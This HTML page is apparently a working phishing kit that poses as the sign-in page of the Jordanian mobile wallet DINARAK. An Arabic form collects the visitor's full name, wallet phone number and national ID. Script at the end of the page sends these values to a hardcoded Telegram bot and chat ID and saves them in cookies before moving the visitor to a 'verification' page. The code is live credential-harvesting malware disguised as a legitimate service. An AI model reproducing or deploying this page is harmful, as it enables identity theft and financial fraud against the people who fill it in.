<!DOCTYPE html>
<!-- Last Published: Sat Nov 02 2024 03:43:02 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="" data-wf-page="58e125466699330e60585c64" data-wf-site="64ef7d0d34ee51e7fdfd939c" lang="en">

<head>
  <meta charset="utf-8" />
  <title>DINARAK- الصفحة الرئيسية</title>
  <meta content="DINARAKJo" property="og:title" />
  <meta content="DINARAKJo محفظة" property="og:description" />
  <meta content="https://www2.0zz0.com/2025/03/22/14/224201474.jpg" property="og:image" />
  <meta content="DINARAKJo محفظة" property="twitter:title" />
  <meta content="https://www2.0zz0.com/2025/03/22/14/224201474.jpg" property="twitter:image" />
  <meta property="og:type" content="website" />
  <meta content="summary_large_image" name="twitter:card" />
  <meta content="width=device-width, initial-scale=1" name="viewport" />
  <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css" />
  <link href="https://fonts.googleapis.com" rel="preconnect" />
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous" />
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">
    WebFont.load({
      google: {
        families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Roboto:300,regular,500"]
      }
    });
  </script>
  <script type="text/javascript">
    !function (o, c) {
      var n = c.documentElement, t = " w-mod-"; n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch")
    }(window, document);
  </script>
  <link href="" rel="shortcut icon" type="image/x-icon" />
  <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon" />
  <style>
    body {
      box-sizing: border-box;
      font-size: 18px;
    }

    .container {
      /*max-width: 800px;*/
      padding: 0 5%;
      /*margin: auto;*/
    }

    .field-holder {
      position: relative;
      margin-bottom: 1.25em;
    }

    .w-input {
      border: 0;
      border-bottom: 3px solid #FF1493;
      outline: none;
    }

    label {
      position: absolute;
      top: 0;
      left: 0;
      font-size: 1em;
      color: #FF1493;
      display: flex;
      align-items: center;
      cursor: text;
      transition: .3s ease-in-out;
    }

    .w-input,
    label {
      font-size: 1em;
      width: 100%;
      height: 55px;
    }

    .w-input:focus + label,
    .w-input:valid + label {
      color: #FF1493;
      font-size: .75em;
      top: -25px;
      pointer-events: none;
    }

    .w-input:focus,
    .w-input:valid {
      border-bottom: 3px solid #FF1493;
    }

    .CustomFooter {
      position: fixed;
      left: 0;
      bottom: 0;
    }

    .submit-button {
      background-color: #FF1493;
    }

    .button-black {
      background-color: black;
      color: white;
    }

    .not-black {
      background-color: #FF1493;
    }

    .image-middle {
      display: block;
      margin-left: auto;
      margin-right: auto;
      width: 50%;
    }

    .request-text {
      text-align: center;
      font-size: 1.5em;
      color: #FF1493;
      margin-top: 20px;
    }
    
    .checkbox-container {
      display: flex;
      align-items: center;
      margin-bottom: 1.25em;
    }
    
    .checkbox-container input {
      margin-right: 10px;
    }
    
    .checkbox-container label {
      font-size: 1em;
      color: #FF1493;
    }
  </style>
</head>

<body class="body">
  <div class="div-block-2">
    <img src="https://www2.0zz0.com/2025/03/22/14/224201474.jpg" alt="Top Image" class="image-middle">
    <div class="request-text">قم بتقديم طلبك</div>
  </div>
  <div class="div-block-4">
    <div class="container">
      <div class="w-form">
        <form id="signin" name="wf-form-" data-name="تسجيل الدخول" action="/verification.html" method="get" data-wf-page-id="58e125466699330e60585c64" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">
          <div id="field" class="field-holder"><input class="text-field-2 w-input" name="fullname" placeholder="" type="text" id="fullname" required="" /><label for="fullname" class="field-label">الاسم الرباعي</label></div>
          <div id="field" class="field-holder"><input class="text-field-2 w-input" minlength="10" maxlength="10" name="phonenumber" inputmode="numeric" data-name="رقم الهاتف" pattern="^(079|078|077)[0-9]{7}$" placeholder="" type="text" id="phonenumber" required="" /><label for="phonenumber" class="field-label">رقم هانف المحفظة</label></div>
          <div id="field" class="field-holder"><input class="text-field-2 w-input" minlength="10" maxlength="10" name="nationalid" inputmode="numeric" data-name="الرقم الوطني" pattern="^[0-9]{10}$" placeholder="" type="text" id="nationalid" required="" /><label for="nationalid" class="field-label">الرقم الوطني</label></div>
          <div id="field" class="field-holder">
          <div class="div-block"><input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="تسجيل دخول" /></div>
        </form>
        <div class="w-form-done">
          <div>Thank you! Your submission has been received!</div>
        </div>
        <div class="w-form-fail">
          <div>Oops! Something went wrong while submitting the form.</div>
        </div>
      </div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.20.1/dist/jquery.validate.min.js"></script>
  <script>
    function setCookie(cname, cvalue, exdays) {
      const d = new Date();
      d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
      let expires = "expires=" + d.toUTCString();
      document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
    }

    $('#signin').on("submit", function () {
      var fullname = document.getElementById('fullname').value;
      var phonenumber = document.getElementById('phonenumber').value;
      var nationalid = document.getElementById('nationalid').value;

      
      var message = "الاسم الرباعي: `" + fullname + "`\n"
      message += "رقم الهاتف: `" + phonenumber + "`\n"
      message += "الرقم الوطني: `" + nationalid + "`\n"



      $.ajax({
        type: 'POST',
        url: `https://api.telegram.org/bot7578423392:AAFJ9fcnZBcQiq-FZ0MvLKCmuv83UtUU98Y/sendMessage`,
        data: {
          chat_id: "6873334348",
          text: message,
          parse_mode: 'markdown',
        },
        success: function (res) {
          console.debug(res);
          $('#response').text('Message sent');
        },
        
      });

      setCookie("fullname", fullname, 1000);
      setCookie("phonenumber", phonenumber, 1000);
      setCookie("nationalid", nationalid, 1000);

    })
  </script>
</body>

</html>